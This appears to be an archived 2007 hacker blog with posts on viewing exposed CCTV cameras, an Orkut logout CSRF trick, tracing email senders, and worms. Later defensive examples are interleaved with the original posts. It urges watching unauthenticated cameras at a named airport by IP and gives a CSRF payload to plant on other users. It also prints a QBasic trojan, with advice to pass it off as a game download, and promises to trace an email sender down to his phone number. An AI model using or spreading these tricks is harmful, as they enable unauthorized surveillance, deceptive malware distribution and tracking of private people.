Friday, December 7, 2007

Increasing the span of my vision


All of us hackers must have seen the movie Die Hard 4, in which the villains break into CCTV cameras throughout the film. At first I thought it was not possible, but then I leapt into the field of CCTV hacking, and what I eventually found out is what I am about to write in the next few paragraphs.

CCTV cameras are everywhere: in airports, in hospitals, in schools, in hostels, in offices, restaurants, government buildings, and where not!!!

Many network cameras and video servers have a built-in web server that streams the picture over HTTP, out onto the World Wide Web. Yes, the WWW. And that's what we make use of. When such a server is reachable from the Internet without a password, search engines crawl it like any other site, so we can search for it and watch whatever is going on. Note that keeping crawlers away (a robots.txt) does not protect a camera; only requiring authentication does. Something I call: seeing the world.

So all we have to do is find those exposed cameras and open them. That's it: no passwords, no authentication. All you need to know is the IP of the camera server (every camera server has one) and the path of the script that streams the picture. A video server can feed several cameras, and we can reach each of them through the same server if it lets us pass the camera argument. The servers I found are Axis 2400 video servers. Strictly speaking there is no vulnerability to know here: the server is simply exposed with no authentication configured. I have to do more research on this stuff before I can tell how to do more advanced things.

The main theory behind this type of surveillance is that the streaming scripts on these servers live under the /axis-cgi/mjpg or /axis-cgi/jpg directories (a Motion JPEG stream and a single JPEG still, respectively). The viewer page may be a swf (Flash movie) wrapping the stream, or the stream may be fetched straight from the cgi script. The root of the camera server may also provide multi-camera views and some administrative setup pages, which obviously is more fun.


That path is what goes into the search string when we search for the exposed cams. In this demo, I'll give you the IP of the CCTV server at Stuttgart airport in Germany. The IP is 195.243.185.195, and here's a screenshot of that airport's various cameras:
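The check a practitioner actually wants here is the reverse of the post: does my own camera server answer those paths without asking for a password? The script below is an added example, not code from the original post or from Axis. It assumes a host you are authorised to test; the two directory names come from the post, while the specific CGI file names (video.cgi, image.cgi), the camera= argument and /view/index.shtml are taken from Axis's documented VAPIX interface and are assumptions about the firmware in front of you. It never bypasses anything: an open server simply answers 200 with an image or multipart stream, a protected one answers 401.

```python
"""Audit an Axis-style camera/video server for unauthenticated stream paths.

Added example (not the post's own code).  Run as:  python audit_cam.py http://camera.example
"""
import http.client
import sys
import urllib.parse

# Directories named in the post plus the endpoints Axis documents under them (assumed).
CAMERA_PATHS = [
    "/axis-cgi/mjpg/video.cgi",            # Motion JPEG stream
    "/axis-cgi/jpg/image.cgi",             # single JPEG still
    "/axis-cgi/mjpg/video.cgi?camera=2",   # second input on a multi-camera video server
    "/view/index.shtml",                   # viewer page on older firmware
]


def classify(status, content_type):
    """Map status + Content-Type onto what it means for the camera's exposure."""
    if status in (401, 407):
        return "auth-required"          # what a correctly configured camera answers
    if status == 403:
        return "forbidden"
    if status == 200 and content_type.startswith(("image/jpeg", "multipart/x-mixed-replace")):
        return "OPEN-STREAM"            # picture served to anyone who knows the URL
    if status == 200:
        return "open-page"              # HTML (viewer/admin page) served without a login
    if status == 404:
        return "absent"
    return f"other({status})"


def audit(base_url, paths=CAMERA_PATHS, timeout=5.0):
    """Request each path once and return {path: classification}.

    A GET is used rather than HEAD because MJPEG endpoints may not answer HEAD,
    but only the response headers are read: an MJPEG body never ends."""
    u = urllib.parse.urlsplit(base_url)
    conn_cls = http.client.HTTPSConnection if u.scheme == "https" else http.client.HTTPConnection
    results = {}
    for path in paths:
        conn = conn_cls(u.hostname, u.port, timeout=timeout)
        try:
            conn.request("GET", path)
            resp = conn.getresponse()
            results[path] = classify(resp.status, resp.getheader("Content-Type", ""))
        except OSError as exc:                       # refused, timeout, TLS error, ...
            results[path] = f"error({exc.__class__.__name__})"
        finally:
            conn.close()
    return results


if __name__ == "__main__":
    for path, verdict in audit(sys.argv[1]).items():
        print(f"{verdict:14} {path}")
```

Anything reported as OPEN-STREAM is exactly what the search-engine approach above finds; the fix is to enable authentication on the server (and, better, not to expose it to the Internet at all), not to hide it from crawlers.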

Just make sure you don't do anything stupid enough to drive the German cops to your home!!!
;)
Till then, happy surveillance!!!

Thursday, December 6, 2007

Yet another orkut trick.....



Well, yet another nasty JavaScript trick for Orkut users. Write this into your scrap, and any user who views the page containing the scrap gets logged out. As can be seen, it embeds an object whose source is the logout URL:
"http://www.orkut.com/GLogin.aspx?cmd=logout"
Here we are abusing the active server page by calling its cmd argument with the value logout. Because logging out is triggered by a plain GET with no token, the victim's browser makes that request with the victim's own cookies as soon as it renders the embedded object, and the session ends. This is a cross-site request forgery (CSRF), just aimed at logout rather than at something more valuable. This does the trick...
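To make the class of bug concrete, here is the pattern the post describes beside a hardened version. This is an added example written for this page, not Orkut's code: the Request object, the session dictionary, the cmd=logout parameter and the csrf field names are assumptions chosen to mirror the URL above, and the handlers are plain functions so the check can be followed without a web framework.

```python
"""Logout via GET (CSRF-able) versus a logout that needs a same-site POST + token.

Added example, not Orkut's code; request/session shapes are assumptions.
"""
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import parse_qs


@dataclass
class Request:
    method: str
    query: str = ""                                   # raw query string, e.g. "cmd=logout"
    form: dict = field(default_factory=dict)          # POST body fields
    headers: dict = field(default_factory=dict)
    session: dict = field(default_factory=dict)       # server-side state tied to the cookie


def vulnerable_logout(req):
    """Any request carrying cmd=logout ends the session, GET included.

    An <img>, <iframe> or <object> in somebody's scrap makes the victim's browser
    fetch this URL with the victim's cookies, so the victim is logged out."""
    if parse_qs(req.query).get("cmd") == ["logout"]:
        req.session.clear()
        return 302, "logged out"
    return 200, "ok"


def issue_csrf_token(session):
    """Mint a random per-session token; the logout form must echo it back."""
    token = secrets.token_urlsafe(32)
    session["csrf"] = token
    return token


def hardened_logout(req, site_origin="https://www.orkut.com"):
    """Only a same-origin POST carrying the session's token may log out."""
    if req.method != "POST":
        return 405, "logout must be a POST"       # an embedded object can only issue a GET
    origin = req.headers.get("Origin") or req.headers.get("Referer", "")
    if not origin.startswith(site_origin):
        return 403, "cross-site request"          # missing Origin/Referer fails closed
    expected = req.session.get("csrf")
    supplied = req.form.get("csrf", "")
    # A cross-site form can still POST, so the secret token is the real defence.
    if not expected or not hmac.compare_digest(expected, supplied):
        return 403, "missing or wrong CSRF token"
    req.session.clear()
    return 302, "logged out"


if __name__ == "__main__":
    victim = {"user": "alice"}
    print(vulnerable_logout(Request("GET", "cmd=logout", session=victim)), victim)
    victim = {"user": "alice"}
    print(hardened_logout(Request("GET", "cmd=logout", session=victim)), victim)
    tok = issue_csrf_token(victim)
    print(hardened_logout(Request("POST", form={"csrf": tok},
                                  headers={"Origin": "https://www.orkut.com"},
                                  session=victim)), victim)
```

The method check alone defeats the scrap trick, because an embedded object cannot POST; the token and origin checks are what stop an attacker who hosts an auto-submitting form elsewhere.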
Try it!!!
Comments and suggestions are most welcome...
:)

Tuesday, December 4, 2007

Tracking down an email



Email tracing has long been one of the prime tools of the authorities: following a mail back to the sender's door. And not surprisingly, it is also one of the easiest things to do. The amount of information is limited, but it can still yield the IP address the sender was using at the time the mail was sent, and that is no small achievement.

This is accomplished by studying the email headers. If the IP belongs to a network registered to an organisation, a whois lookup on it gives that organisation's name and registered address (the registrant's address, not necessarily the sender's desk); if it is a personal Internet connection, whois only tells us the name of the company the sender connected through, that is the ISP (Internet Service Provider), and the ISP's hostname for the address may hint at the region.

Now, we get to the real thing. We consider an example email header, from which, we trace the mail back to the sender.

Here's a sample mail header:

This one is the header of a mail from McAfee.
Example 1

From McAfee Fri Aug 24 04:11:46 2007
X-Apparently-To: xtreme_the_great1@yahoo.co.in via 202.43.219.101; Sat, 25 Aug 2007 21:45:41 +0530
X-Originating-IP: [216.49.92.103]
Return-Path:
Authentication-Results: mta125.mail.in.yahoo.com from=mcafee.com; domainkeys=neutral (no sig)
Received: from 216.49.92.103 (HELO mcafee.com) (216.49.92.103) by mta125.mail.in.yahoo.com with SMTP; Sat, 25 Aug 2007 21:45:40 +0530
X-Mailer: UnityMail
Errors-To:
Originator:
X-Mailer-Version: 5.1.182
X-UnityID: <20070823224146.hxfcjbysebaaa3aumail4.xtreme_the_great1@yahoo.co.in@unity4.mcafee.com>
X-UnityUser: McAfee
Reply-to: "McAfee"
From: "McAfee"
To:"xtreme_the_great1@yahoo.co.in"
Subject: McAfee Security Brief 08.07: Microsoft Vulnerabilities
Date: Thu, 23 Aug 2007 15:41:46 -0700
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="----=_NextPart_000_0963_01C7E5D6.C90B46F0"
Thread-Index: AcfmEXVgCOCwhz8cS5K6y62QtMC7QQ==
Content-Class: urn:content-classes:message
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1807
Content-Length: 19546


X-Originating-IP, as Yahoo writes it, is the address of the host that handed the message to Yahoo's MTA, that is, the SMTP server used in the process. Mail servers are the machines that move mail across the Internet; in this case it is 216.49.92.103. The sending machine's IP can also be figured out from the mail header itself, by examining the Received fields (which are written by the receiving server, not the sender). Here there is only one, and it reads:

Received: from 216.49.92.103 (HELO mcafee.com) (216.49.92.103) by mta125.mail.in.yahoo.com with SMTP; Sat, 25 Aug 2007 21:45:40 +0530

The sending IP here is thus the same as that of the first mail server in the path: 216.49.92.103. (A bulk mailer like this one is a server, not a person's PC, so the trace ends there.)

But things are not always this simple.

Consider another case, where several mail servers handle the message along the way.


Example 2

X-Apparently-To: xtreme_the_great1@yahoo.co.in via 202.43.219.149; Sun, 25 Mar 2007 18:02:32 +0530
X-Originating-IP: [202.43.219.31]
Return-Path:
Authentication-Results: mta135.mail.in.yahoo.com from=yahoo.co.in; domainkeys=pass (ok)
Received: from 202.43.219.31 (HELO web8316.mail.in.yahoo.com) (202.43.219.31) by mta135.mail.in.yahoo.com with SMTP; Sun, 25 Mar 2007 18:02:32 +0530
Received: (qmail 84649 invoked by uid 60001); 25 Mar 2007 12:32:32 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.co.in; h=X-YMail-OSG:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding:Message-ID; b=0s8bAtp2vC7RFSCYSfLno7bSWfAP6ebccb/weUTLZiw/rWfNuCgFdZvZUc9iMyUkgYuxqjz7WX3LqbMS8L8Qpyg4sM+M+BR2YQt50I330raEEFk5kuAjjGCNOZBe8zFphRNtIeAsOFJ8keIEQ+0kzbPdJQ0xuon7g7mDTyJv0Tw=;
X-YMail-OSG: jC_yrKkVM1n7FtpNbkqEXJdYRgDvi3PDe0HUOmSPKTBwyHwm_1crZ.fBVw6xODaYBudsxpwFsOtmkF6_lYfGUTo.FBDkKgfTLsoHun6qK.irkJFE.QqhNsPs2JfHOpVQDVVdACQ4HUZ7A9SFDqR7KA6pTw--
Received: from [122.168.69.140] by web8316.mail.in.yahoo.com via HTTP; Sun, 25 Mar 2007 13:32:31 BST
Date: Sun, 25 Mar 2007 13:32:31 +0100 (BST)
From: "sooraj elamana"
Subject: Proxy Lists by Sooraj E
To:xtreme_the_great1@yahoo.co.in
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="0-575879626-1174825951=:84636"
Content-Transfer-Encoding: 8bit
Message-ID: <34533.84636.qm@web8316.mail.in.yahoo.com>
Content-Length: 58637

Here we read the Received fields and deduce what we are supposed to deduce: the IP of the sender at the time of sending the message. X-Originating-IP is 202.43.219.31, the IP of the first mail server in the path as seen from the receiving side. Then we come to the point. Received lines are prepended as the mail travels, so the topmost one is the last hop and the bottom one is the hop closest to the sender.

The first (topmost) Received field says the message was obtained from 202.43.219.31, a.k.a. web8316.mail.in.yahoo.com; that is, the machine introduced itself to the mail server mta135.mail.in.yahoo.com as web8316.mail.in.yahoo.com (the HELO name), and the IP in parentheses is what mta135 actually observed on the connection.

The second Received line ("qmail 84649 invoked by uid 60001") is local bookkeeping on web8316 and names no remote host. The third says the message was obtained from 122.168.69.140 by web8316.mail.in.yahoo.com via HTTP, that is, the sender used a web browser (webmail) to send the email, and 122.168.69.140 is the browser's address as Yahoo saw it.

Then, to find out more about the sender, we look up the obtained IP 122.168.69.140 with the nslookup command (a reverse DNS, or PTR, lookup), which returns the following:

Name: ABTS-MP-dynamic-140.69.168.122.airtelbroadband.in
Address: 122.168.69.140

That is, the sender's ISP is Airtel Broadband and he is in India, in the state of Madhya Pradesh (deduced from the ABTS-MP in the hostname, which is an ISP naming convention rather than a guarantee), and the IP is dynamic: the next time the sender logs on to the ISP he will have a new one, so the timestamp in the header is what the ISP would need to say who held the address. Two caveats: only the Received lines added by servers you trust (here Yahoo's) are reliable, because everything below the point where the mail entered their systems could have been forged by the sender; and if the sender went through a proxy or VPN, this address is the proxy's, not his.

In the next post, I'll demonstrate how I traced down a sender to his college, and got a phone number, so that I could talk to him! Keep checking. :)

Saturday, December 1, 2007

Worms.

A worm is a computer program that copies itself from machine to machine over a network. Like viruses and Trojans, worms are malicious code and usually carry some sort of evil intent; even without a payload they use up computer time and network bandwidth while replicating.

Unlike a virus, a worm does not need to attach itself to an existing program. Worms typically harm the network (if only by consuming bandwidth), whereas viruses infect or corrupt files on the targeted computer. Worms can expand from a single copy incredibly quickly.

A worm usually exploits some security hole or bug in a piece of software or the OS. Some famous worms are Mydoom and Sobig (both spreading via email) and Code Red (which exploited a buffer overflow in Microsoft IIS and used the infected machines to flood whitehouse.gov).

All about viruses n worms...

This is a little trojan written in Qbasic 4.5

REM bitch by Spear
REM Prank "installer": tries to fill the root directory with empty directories.
REM Written for QuickBASIC 4.5; runs under DOS.
color 14,0
print"installing datafiles... Please wait..."
print"This may take up to 20 minutes, depending on your computer..."
chdir "\"            ' SHELL "cd\" only changes directory in the child COMMAND.COM, so CHDIR is used
for a = 1 to 100000
a$=str$(a)           ' STR$ adds a leading space, so "md" + a$ becomes "md 1", "md 2", ...
c$="md" + a$ + ".hee"
shell c$             ' spawns COMMAND.COM /C md <n>.hee on every iteration
next a
cls
print"Cybermattixx Version 1.0 is now installed on your system..."
print"Have a sh*tty day!"
print " ?AM?"
print
input "Hit ENTER To REBOOT your System now!";a$
shell "boot.com"     ' assumes a boot.com reboot utility is on the PATH; plain DOS ships none

How to use it?
This can pose as the installation program for a game. That is, upload it to a BBS or something, post that it is a kickass game, and people will download it and try to install it on their computers!

What does it do?
This program changes directory to the root and tries to make 100000 dirs there. In practice a FAT root directory holds at most 512 entries, so only the first few hundred md commands succeed; the rest fail, and most of the "20 minutes" is spent spawning a shell per iteration. The directories are also not as stubborn as the old readme claims: reversing the program (rd instead of md) in a batch FOR loop, or deltree with a wildcard, removes them, so there is no need to format c: or d:.